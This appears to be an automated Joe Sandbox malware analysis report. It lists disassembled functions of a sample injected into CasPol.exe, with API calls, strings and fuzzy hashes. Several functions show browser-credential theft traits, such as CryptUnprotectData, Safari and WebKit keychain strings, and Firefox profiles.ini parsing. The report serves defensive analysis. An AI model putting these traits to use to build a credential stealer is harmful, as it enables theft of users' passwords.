                                                                                                                                                                                  • Instruction Fuzzy Hash: 8351E1B2A10A159BE75CCF1AC9652A9BFE3DFD1301B19817ED1E7C7280C6749142EB00
                                                                                                                                                                                  Function 004476F0 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4d68b984f6741099ce2bde8e18abc1ceb050e4a180a5a8b929aeeeda86c5e3a3
                                                                                                                                                                                  • Instruction ID: 4c30e17d77d63121b98ae7abe83a1eda91c3bbaf1771cbdb9001038880bae346
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d68b984f6741099ce2bde8e18abc1ceb050e4a180a5a8b929aeeeda86c5e3a3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 55613BB0A097118FD358CF2AC88066BFBE1FBC8315F448A2EE5D9C3295D778A505CB51
                                                                                                                                                                                  Function 0044B610 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 32abcd04455321b07f66e99fd0bcc8daf237abc4de33049fd76ff7c9198d1abb
                                                                                                                                                                                  • Instruction ID: 7b529b0c1894574a094486b107de62a614b2b8bb623f091bad4def53639f0530
                                                                                                                                                                                  • Opcode Fuzzy Hash: 32abcd04455321b07f66e99fd0bcc8daf237abc4de33049fd76ff7c9198d1abb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C5126B17203054BE308CE28EC503AA7BD3EBC534AF18C63DC541C768AD67EE5164785
                                                                                                                                                                                  Function 0044BBD8 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 3b3061fac263143bf3d11d038388f116502fba1d2a280c6dd7583d1d6c59509c
                                                                                                                                                                                  • Instruction ID: 3574e4e96b5cae7c2ce7dcf764c1f42f5149340d1e6b4e9c3817a5d878268b27
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b3061fac263143bf3d11d038388f116502fba1d2a280c6dd7583d1d6c59509c
                                                                                                                                                                                  • Instruction Fuzzy Hash: A25119729245F08EE395CB3F8454812BFE2AFCD21234FC2D6D8D86B567D2719822DB94
                                                                                                                                                                                  Function 00447310 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 916c56741cc8f6ade01a16149e57abe195bb5378381ef9de74a807da475a2b6d
                                                                                                                                                                                  • Instruction ID: a63f790cb74f6972c31383897434a808543730992f85785b63cb3a81aa66305c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 916c56741cc8f6ade01a16149e57abe195bb5378381ef9de74a807da475a2b6d
                                                                                                                                                                                  • Instruction Fuzzy Hash: D751A26170D7905BD7098B3894506AFFFD1ABDA304F498A6DF4CA9B382C5249A08C79A
                                                                                                                                                                                  Function 0044A490 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 29029382298886ffb5c972b1d452ec7b0888992857c24374549475b705505bbf
                                                                                                                                                                                  • Instruction ID: c0f57332b75f98b7b3b9f2f8260941e7774f0d3fac54c31b43d02fa3067fd927
                                                                                                                                                                                  • Opcode Fuzzy Hash: 29029382298886ffb5c972b1d452ec7b0888992857c24374549475b705505bbf
                                                                                                                                                                                  • Instruction Fuzzy Hash: E351115510DBD29EC3268B7D4490196FFF16E77101708CA8EE4EA47B83D118F6A8DBB2
                                                                                                                                                                                  Function 00404BE5 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: bf2dd090743e2c6723c98dc34c7731ba56a2aa4091d3d4934fb2d269311e6206
                                                                                                                                                                                  • Instruction ID: 6bf344bc0ac2e9a1038f2722d90c5adff34fed9f267e6e685f57ef4be10f9a8b
                                                                                                                                                                                  • Opcode Fuzzy Hash: bf2dd090743e2c6723c98dc34c7731ba56a2aa4091d3d4934fb2d269311e6206
                                                                                                                                                                                  • Instruction Fuzzy Hash: C20171367207058FD308CFADFCC1966B3B2FBD92127084539DA01C3267EA78E921CA54
                                                                                                                                                                                  Function 00404B74 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                                                                                                                  • Instruction ID: 1c8cf4990013556009a943ce68bbe5c533817c3d042a03847a5f6a4628de1edc
                                                                                                                                                                                  • Opcode Fuzzy Hash: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA01E8326159308FA389DE3AC80144377E3FFCA32532AC1E5C945AB57DD6316847DB90
                                                                                                                                                                                  Function 00404B03 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                                                                                                                  • Instruction ID: e46ac8c8d649937048925bbc22b10e31c7d260e61c9919193dd0f57e0586c858
                                                                                                                                                                                  • Opcode Fuzzy Hash: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                                                                                                                  • Instruction Fuzzy Hash: 75011E326019208FA38DCE3AC80545377E3FFCA325326C1E8D845AB579D6316802CBD4
                                                                                                                                                                                  Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                  • API String ID: 2929817778-1134094380
                                                                                                                                                                                  • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                  • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                  Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                  • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                  • API String ID: 2787044678-1921111777
                                                                                                                                                                                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                  Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                  • API String ID: 2080319088-3046471546
                                                                                                                                                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                  Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                  • memset.MSVCRT ref: 00413292
                                                                                                                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                  • memset.MSVCRT ref: 00413310
                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                  • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                                                                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                  Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 829165378-0
                                                                                                                                                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                  Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                                                                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                  Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                  • API String ID: 4054529287-3175352466
                                                                                                                                                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
